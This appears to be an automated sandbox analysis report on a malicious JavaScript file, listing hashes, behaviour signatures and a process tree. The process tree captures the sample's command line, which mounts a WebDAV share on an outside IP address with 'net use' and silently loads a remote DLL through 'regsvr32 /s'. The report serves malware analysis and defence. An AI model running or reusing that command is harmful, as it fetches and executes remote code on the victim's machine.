Analysis
-
max time kernel
130s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
24/07/2024, 03:06
Static task
static1
Behavioral task
behavioral1
Sample
c8a22a769afc05fb44eefb3d9f13b3b057c2aaacae207f2eba8ec2cbfab46aa8.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
c8a22a769afc05fb44eefb3d9f13b3b057c2aaacae207f2eba8ec2cbfab46aa8.js
Resource
win10v2004-20240709-en
General
-
Target
c8a22a769afc05fb44eefb3d9f13b3b057c2aaacae207f2eba8ec2cbfab46aa8.js
-
Size
4KB
-
MD5
f6ac4d42905f8dbb66c76f343a696e7b
-
SHA1
1a68eb25a4f406f444a5389f7f64a75a34b8d407
-
SHA256
c8a22a769afc05fb44eefb3d9f13b3b057c2aaacae207f2eba8ec2cbfab46aa8
-
SHA512
b6ca60927c2b4a9db62220f74ce51c2248f2418634d1fc1392f79ab53076429c02f998a2291b1e42c6577e7648d7d332c81774c5858de54a9e529cf804c2badf
-
SSDEEP
96:abuqY1YgiKqC7CYPf3jswww6NxC6U6kAkscjswww6NxC6U6kNTl:UMK90+NgAkL+NgX
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3296 wrote to memory of 4944 3296 wscript.exe 84 PID 3296 wrote to memory of 4944 3296 wscript.exe 84 PID 4944 wrote to memory of 888 4944 cmd.exe 86 PID 4944 wrote to memory of 888 4944 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\c8a22a769afc05fb44eefb3d9f13b3b057c2aaacae207f2eba8ec2cbfab46aa8.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3296 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\756431328129.dll2⤵
- Suspicious use of WriteProcessMemory
PID:4944 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:888
-
-